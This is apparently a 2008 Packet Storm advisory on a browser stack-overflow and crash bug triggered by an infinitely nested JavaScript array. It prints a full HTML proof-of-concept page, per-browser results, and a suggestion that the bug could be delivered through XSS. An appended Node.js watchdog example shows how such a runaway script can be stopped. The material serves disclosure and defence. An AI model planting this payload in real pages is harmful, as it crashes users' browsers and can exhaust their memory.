browser-overflows.txt

Date: 04 Nov 2008 00:00:00
Reported by: Lostmon
Type: packetstorm
Source: packetstormsecurity.com

Multiple Browsers Stack overflow in javascript with infinite array vulnerabilit

`##################################################  
Multiple Browsers Stack overflow in javascript with infinite array  
original article:http://lostmon.blogspot.com/  
2008/11/multiple-browsers-stack-overflow-in.html  
##################################################  
############  
Description  
############  
  
Multiple browsers are prone to a stack overflow  
or crash via an infinite array in the JavaScript engine.  
This is extended research based on this vulnerability/exploit:  
http://www.securityfocus.com/bid/31703  
  
This issue can be used, for example, in a web post vulnerable to  
XSS-style attacks or similar, to cause a DoS against the victim's web browser.  
  
################  
Browsers Tested:  
################  
  
Fail = affected  
pass = Not affected ¿?  
  
#####################  
Testing  
#####################  
.:[-Multiple Browsers infinite array PoC By Lostmon -]:.  
Here you have two variants of this array; save this file:  
#####################################  
<html>  
<head>  
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>  
<script type="text/javascript">  
function infinite_array()  
{  
foo = new Array();  
alert('infinite array');  
while(true) {foo = new Array(foo);}  
}  
function infinite_array2()  
{  
foo = new Array();  
alert('Infinite array with sort()');  
while(true) {foo = new Array(foo).sort();}  
}  
</script>  
</head>  
<body>  
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>  
<input type="button" value="Infinite array Without sort()"  
onclick="infinite_array();" />  
<input type="button" value="Infinite array with sort()"  
onclick="infinite_array2();" />  
</body></html>  
####################################  
  
See the table image:  
http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF  
  
###############  
Stack Overflow  
###############  
  
In IE7, Avant Browser and Maxthon browsers this causes a stack  
overflow in JavaScript.  
  
In IE7 I tried to trace and exploit it with Olly debugger,  
but in all the cases I tested to make it executable, it always  
went to SEH. This is not exploitable, and the browser can  
continue working without problems once the alert is clicked,  
so this is a recoverable issue. The Microsoft security team has  
determined that this issue is not exploitable at this moment.  
  
In Google Chrome it can cause a tab crash. If only one window  
and one tab are open, opening the exploit and, without waiting,  
trying to navigate to Google or another site causes Google  
Chrome to close without a warning, error or alert. If multiple  
tabs are open, this issue only crashes/closes the tab  
affected by the exploit. If the exploit is opened and left for a few  
seconds, Chrome shows a warning to close the crashed tab.  
  
  
################  
Memory abuse  
################  
  
In IE7 it can cause memory abuse and can make the whole  
system and all applications unstable (it can consume all memory).  
  
In Safari for Windows it can cause program termination: Safari  
closes all windows and all tabs without an alert, warning or  
error. It can be traced with Olly, and it is also a stack overflow.  
  
In Google Chrome it can cause a tab crash. If only one window  
and one tab are open, opening the exploit and, without waiting,  
trying to navigate to Google or another site causes Google Chrome  
to close without a warning, error or alert. If the exploit is opened  
and left for a few seconds, Chrome shows a warning to close the  
crashed tab.  
  
Some other browsers detect slow scripts and ask to stop them.  
In Opera it abuses memory, but we can recover or navigate  
to other sites, so this is a recoverable issue.  
  
#######################€nd#####################  
  
Thnx to Microsoft security team for support & interesting.  
Thnx to Apple security team for support & interesting.  
--  
Thnx to estrella for being my light  
Thnx To FalconDeOro for his support  
Thnx To Imydes From http://www.imydes.com  
  
--  
Sincerely:  
Lostmon ([email protected])  
  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
Curiosity is what makes the mind move....  
  
`
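
The advisory notes that some browsers detect slow scripts and offer to stop them. The following is an added example, not part of the original advisory or of any browser's code: it applies the same time-budget idea in Node.js through `vm.runInNewContext` and its `timeout` option. The names `runWithWatchdog`, `RUNAWAY` and `BENIGN` are hypothetical and the inputs are constructed.

```javascript
// Added example: a time-budget watchdog, modelled on the "slow script" prompt.
const vm = require('node:vm');

// Constructed inputs: the loop body from the PoC above and a script that ends.
const RUNAWAY = 'var foo = new Array(); while (true) { foo = new Array(foo); }';
const BENIGN = 'var a = []; for (var i = 0; i < 1000; i++) { a = [a]; } i;';

// Run `source` in a fresh context and stop it once `budgetMs` has elapsed.
// node:vm is not a security boundary; it is used here only for its timer.
function runWithWatchdog(source, budgetMs) {
  const started = Date.now();
  try {
    const value = vm.runInNewContext(source, {}, { timeout: budgetMs });
    return { status: 'completed', value, elapsedMs: Date.now() - started };
  } catch (err) {
    // A timeout surfaces as an Error with this documented code; anything
    // else (syntax error, exception thrown by the script) is reported as is.
    const timedOut = Boolean(err) && err.code === 'ERR_SCRIPT_EXECUTION_TIMEOUT';
    return {
      status: timedOut ? 'stopped' : 'error',
      reason: String(err && err.message),
      elapsedMs: Date.now() - started,
    };
  }
}

console.log(runWithWatchdog(BENIGN, 50).status);
console.log(runWithWatchdog(RUNAWAY, 50).status);
```

A short budget also bounds how much memory the loop can allocate before it is stopped, which is the "memory abuse" effect the advisory describes.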
